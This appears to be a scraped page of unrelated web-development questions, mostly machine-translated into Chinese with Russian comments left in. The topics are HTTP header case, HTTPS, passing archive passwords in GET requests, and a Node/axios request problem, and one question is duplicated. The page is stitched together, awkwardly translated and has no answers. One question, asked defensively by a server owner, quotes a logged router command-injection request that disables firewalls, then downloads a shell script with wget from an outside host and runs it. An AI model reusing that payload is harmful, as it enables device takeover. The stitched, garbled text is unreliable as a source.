http header 中的小写和大写字母有区别吗?
例如两个标头:
test: 123
Test: 123
它们会被视为相同还是不同?
http header 中的小写和大写字母有区别吗?
例如两个标头:
test: 123
Test: 123
它们会被视为相同还是不同?
https 是什么?它与 http 有何不同?
我正在编写一个文件共享网站。它包含一个用于浏览服务器文件夹中文件的树。用户单击该文件夹,并向服务器发送一个请求GET
,其中包含该文件夹路径的参数。服务器返回JSON
此文件夹中文件结构的表示,并且用户“展开”此文件夹的树枝。如果用户选择的文件是存档,则服务器返回JSON
存档中文件夹结构的表示。如果存档使用密码加密,服务器将返回错误并要求用户输入密码,以便向他显示存档的内容。
问题是:
如何使用GET
质询安全地传输密码?(我知道这是一个愚蠢的想法,但我希望你能提出另一种方法。这不适合PUT
我使用)
如果存档是嵌套的并且用户需要输入两个密码,如何保存上一个请求的密码?
# Исходное дерево:
+--- Root
| +--- Folder 1
| \--- File 1
# Пользователь нажал на "Folder 1"
+--- Root
| +--- Folder 1
| | +--- Folder 2
| | |--- Archive 1
| | \--- Folder 3
| \--- File 1
# Пользователь нажал на "Archive 1"
# Сервер попытался отобразить файлы "Archive 1"
# и оказалось, что он требует пароль
# Сервер возвращает "Forbidden" и перед
# пользователем появляется модальное окно с
# предложением ввести пароль. Пользователь
# вводит пароль и он отправляется (КАК?)
# вместе с запросом "GET".
+--- Root
| +--- Folder 1
| | +--- Folder 2
| | |--- Archive 1
| | | +--- Folder 4
| | | |--- Archive 2
| | | |--- File 2
| | | \--- Folder 5
| | \--- Folder 3
| \--- File 1
# Если сейчас пользователь нажмёт на
# "Archive 2", то у меня будут проблемы,
# потому что сервер обязан будет помнить
# пароль от первого архива и должен
# запросить пароль от второго архива.
# Каждый раз сервер начинает обход папок
# с корня "ROOT" как функция
# "scandir".
我应该将密码存储在服务器上吗?在会议中?强制用户立即输入密码列表?存储在js中?如何安全储存和运输?
REST 意识形态对这项任务有何看法?这是一个例外还是有一些好的解决方案?如果我在服务器上以明文形式存储密码,我应该多久清除一次用户会话?
我发现我们新奇的 IT 初创公司的公共服务器正在接收奇怪的请求,显然是某种自动请求。请解释一下这可能是什么?
[GIN] 2023/08/23 - 11:49:28
| 404 | 6.885µs | ip клиента(палить не буду, локация США)
| GET "/cgi-bin/luci/;stok=/locale?
form=country&operation=write&country=$(cd%20/tmp
%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh
%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service
%3Bsystemctl%20stop%20firewalld%3Bservice
%20iptables%C2%A0stop%3Bwget%20http%3A
//(тут тоже был ip , локация Нидерланды)/zizuo.sh%3Bchmod
%20777%20zizuo.sh%3Bsh%20zizuo.sh)"
我应该分析情况吗(如果是,如何分析)?安全问题值得担心吗?我们对这些人回复 404 好吗?
这个问题是标准的,但我尝试了一堆解决方案。也许我在某处做错了什么,因此出现了问题。
重点:
最原始的服务器(甚至不处理任何东西)。
const http = require('http');
const server = http.createServer((request, response) => {
response.end()
})
server.listen(4000);
我对此提出要求:
axios.post('http://localhost:4000/')
.then((response) => console.log(response))
.catch((error) => console.log(error)
);
在.htaccess中添加了各种各样的东西,没有任何帮助。
如何治疗?